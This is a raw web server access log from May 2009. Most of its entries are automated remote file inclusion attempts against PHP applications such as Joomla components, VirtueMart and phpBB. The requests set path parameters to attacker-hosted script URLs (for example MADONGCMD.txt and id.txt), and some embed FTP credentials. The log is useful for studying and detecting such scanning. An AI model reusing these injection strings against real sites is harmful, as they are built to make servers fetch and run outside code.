195.20.225.45 - - [08/May/2009:01:54:47 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/May/2009:01:54:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
92.43.20.6 - - [08/May/2009:01:55:27 -0400] "GET /logs/access_log.Q108121300%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
88.84.128.40 - - [08/May/2009:01:55:33 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:01:55:34 -0400] "GET /convert/mvcw.php?vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
110.45.145.92 - - [08/May/2009:01:55:37 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:01:55:37 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:01:55:37 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
204.11.53.20 - - [08/May/2009:01:55:40 -0400] "GET /net/index.php?dir=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 211 "-" "libwww-perl/5.811"
110.45.145.92 - - [08/May/2009:01:55:41 -0400] "GET /logs/access_log.Q108122500/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
200.32.100.130 - - [08/May/2009:01:55:45 -0400] "GET /logs/access_log.Q108082200%20%20//index.php?DOCUMENT_ROOT=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:01:55:47 -0400] "GET /logs/error_log.Q108030500//include//addons.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.239.42.208 - - [08/May/2009:01:55:48 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
200.32.100.130 - - [08/May/2009:01:55:54 -0400] "GET /logs/access_log.Q108072300%20%20//index.php?DOCUMENT_ROOT=http://www.sysweb.it/user/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:01:55:57 -0400] "GET /logs/access_log.Q109042500//include//addons.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
124.0.54.98 - - [08/May/2009:01:56:06 -0400] "GET /logs/access_log.Q108103000%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
201.232.54.48 - - [08/May/2009:01:56:20 -0400] "GET /logs/access_log.Q108091000/classes/core/language.php?rootdir=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:01:56:29 -0400] "GET /logs/error_log.Q108080800/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:56:39 -0400] "GET /logs/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:56:39 -0400] "GET /config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
210.239.42.208 - - [08/May/2009:01:56:55 -0400] "GET /errors.php?error=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/ngene.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.232.54.48 - - [08/May/2009:01:57:09 -0400] "GET /logs/access_log.Q108091300/classes/core/language.php?rootdir=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:01:57:44 -0400] "GET /logs/error_log.Q107101200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [08/May/2009:01:57:47 -0400] "GET /logs/access_log.Q107101900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.68.188.206 - - [08/May/2009:01:58:06 -0400] "GET /logs/access_log.Q109042500//include//addons.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
124.0.54.98 - - [08/May/2009:01:59:20 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.115.213.66 - - [08/May/2009:01:59:22 -0400] "GET /logs/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:01:59:22 -0400] "GET /config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
66.249.72.114 - - [08/May/2009:01:59:24 -0400] "GET /images/items/index8_Ace_nstergz.jpg HTTP/1.1" 200 2762 "-" "Googlebot-Image/1.0"
61.19.241.61 - - [08/May/2009:01:59:31 -0400] "GET /logs/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:59:36 -0400] "GET /config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
69.89.31.105 - - [08/May/2009:01:59:48 -0400] "GET /logs/access_log.Q108052000/include/functions_common.php?gl_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.812"
209.59.12.99 - - [08/May/2009:01:59:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.84.128.40 - - [08/May/2009:02:00:08 -0400] "GET /logs/access_log.Q108052000/include/functions_common.php?gl_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
69.89.31.105 - - [08/May/2009:02:00:13 -0400] "GET /logs/access_log.Q108080800/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:00:13 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:00:13 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.812"
67.204.25.53 - - [08/May/2009:02:00:16 -0400] "GET /logs/access_log.Q108080800/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:00:16 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:00:16 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:00:22 -0400] "GET /logs/access_log.Q108080800/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:00:23 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
69.89.31.105 - - [08/May/2009:02:00:23 -0400] "GET /logs/access_log.Q108060700/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.812"
88.84.128.40 - - [08/May/2009:02:00:23 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
222.162.115.67 - - [08/May/2009:02:00:25 -0400] "GET /logs/access_log.Q108121300%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.162.115.67 - - [08/May/2009:02:00:25 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.162.115.67 - - [08/May/2009:02:00:25 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
201.232.54.48 - - [08/May/2009:02:00:31 -0400] "GET /logs/access_log.Q108091000/classes/core/language.php?rootdir=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.204.25.53 - - [08/May/2009:02:00:34 -0400] "GET /logs/access_log.Q108052000/include/functions_common.php?gl_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:00:38 -0400] "GET /logs/access_log.Q108060700/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:02:00:43 -0400] "GET /logs/access_log.Q108060700/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
210.68.188.206 - - [08/May/2009:02:00:57 -0400] "GET /logs/error_log.Q108030500//include//addons.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
202.53.250.98 - - [08/May/2009:02:01:00 -0400] "GET /logs/access_log.Q108122400//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
195.228.45.60 - - [08/May/2009:02:01:04 -0400] "GET /logs/access_log.Q109042600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
195.228.45.60 - - [08/May/2009:02:01:05 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
195.228.45.60 - - [08/May/2009:02:01:05 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
202.53.250.98 - - [08/May/2009:02:01:06 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
74.6.8.112 - - [08/May/2009:02:01:10 -0400] "GET /logs/access_log.Q107051800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.89.31.105 - - [08/May/2009:02:01:10 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:01:11 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
201.232.54.48 - - [08/May/2009:02:01:14 -0400] "GET /logs/access_log.Q108091300/classes/core/language.php?rootdir=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:02:01:21 -0400] "GET /logs/error_log.Q108030500//include//addons.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
211.115.213.66 - - [08/May/2009:02:01:26 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:02:01:26 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.162.115.67 - - [08/May/2009:02:01:37 -0400] "GET /logs/access_log.Q108121300//components/com_smf/smf.php?mosConfig_absolute_path=http://jianshenonline.com/mail/mail/FX29ID1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:02:01:50 -0400] "GET /logs/access_log.Q109020500/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:02:01:50 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
110.45.145.92 - - [08/May/2009:02:02:28 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:02:02:28 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:02:02:29 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.145.92 - - [08/May/2009:02:02:39 -0400] "GET /logs/access_log.Q108122500/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
123.125.64.38 - - [08/May/2009:02:03:17 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
210.68.188.206 - - [08/May/2009:02:03:40 -0400] "GET /logs/access_log.Q109042500//include//addons.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
219.94.148.39 - - [08/May/2009:02:03:48 -0400] "GET /logs/access_log.Q108112300///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.94.148.39 - - [08/May/2009:02:03:48 -0400] "GET ///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
219.94.148.39 - - [08/May/2009:02:03:48 -0400] "GET /logs///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 200 486 "-" "Mozilla/5.0"
219.94.148.39 - - [08/May/2009:02:03:56 -0400] "GET /logs/access_log.Q108091000///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:02:04:02 -0400] "GET /logs/access_log.Q108091400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:04:11 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:04:11 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:02:04:11 -0400] "GET /logs/access_log.Q109032100//modules/4nAlbum/public/displayCategory.php?basepath=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:02:04:46 -0400] "GET /logs/access_log.Q108020700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [08/May/2009:02:04:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.116.168.108 - - [08/May/2009:02:05:06 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:05:06 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:02:05:06 -0400] "GET /logs/access_log.Q109032100//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
116.121.201.70 - - [08/May/2009:02:05:14 -0400] "GET /logs/access_log.Q109031800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
116.121.201.70 - - [08/May/2009:02:05:15 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.249.72.114 - - [08/May/2009:02:05:31 -0400] "GET /logs/error_log.Q108100500 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
190.144.44.36 - - [08/May/2009:02:05:37 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.xgamex.org/xgamex//id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
190.144.44.36 - - [08/May/2009:02:05:37 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.xgamex.org/xgamex//id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [08/May/2009:02:05:37 -0400] "GET /logs/access_log.Q108100700//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.xgamex.org/xgamex//id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
190.144.44.36 - - [08/May/2009:02:05:37 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.xgamex.org/xgamex//id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
90.156.153.184 - - [08/May/2009:02:05:39 -0400] "GET ///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
90.156.153.184 - - [08/May/2009:02:05:39 -0400] "GET /logs///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 200 486 "-" "Mozilla/5.0"
90.156.153.184 - - [08/May/2009:02:05:39 -0400] "GET /logs/access_log.Q108112300///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.121.201.70 - - [08/May/2009:02:05:39 -0400] "GET /logs/access_log.Q109031800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:05:39 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [08/May/2009:02:05:41 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 485 "-" "libwww-perl/5.65"
66.197.202.64 - - [08/May/2009:02:05:50 -0400] "GET /logs/access_log.Q109032100%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
210.239.42.208 - - [08/May/2009:02:05:51 -0400] "GET /logs/access_log.Q108072000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
115.145.170.177 - - [08/May/2009:02:05:52 -0400] "GET /logs/access_log.Q109031800//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
210.239.42.208 - - [08/May/2009:02:05:52 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
115.145.170.177 - - [08/May/2009:02:05:52 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
115.145.170.177 - - [08/May/2009:02:05:53 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 485 "-" "libwww-perl/5.805"
69.89.31.105 - - [08/May/2009:02:05:55 -0400] "GET /logs/access_log.Q109012400/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:05:55 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.812"
69.89.31.105 - - [08/May/2009:02:05:55 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.812"
90.156.153.184 - - [08/May/2009:02:06:13 -0400] "GET /logs/access_log.Q108091000///?_zb_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
202.21.134.11 - - [08/May/2009:02:06:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054664A7320E900829C05I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
210.239.42.208 - - [08/May/2009:02:06:27 -0400] "GET /logs/access_log.Q108090800//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.204.25.53 - - [08/May/2009:02:06:27 -0400] "GET /logs/access_log.Q109012400/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:06:28 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
67.204.25.53 - - [08/May/2009:02:06:28 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
202.21.134.11 - - [08/May/2009:02:06:30 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054664A7320E900829C05I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
69.89.31.105 - - [08/May/2009:02:06:37 -0400] "GET /logs/access_log.Q108122400/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.812"
62.116.168.108 - - [08/May/2009:02:06:51 -0400] "GET /logs/access_log.Q109032100%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
67.204.25.53 - - [08/May/2009:02:07:23 -0400] "GET /logs/access_log.Q108122400/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
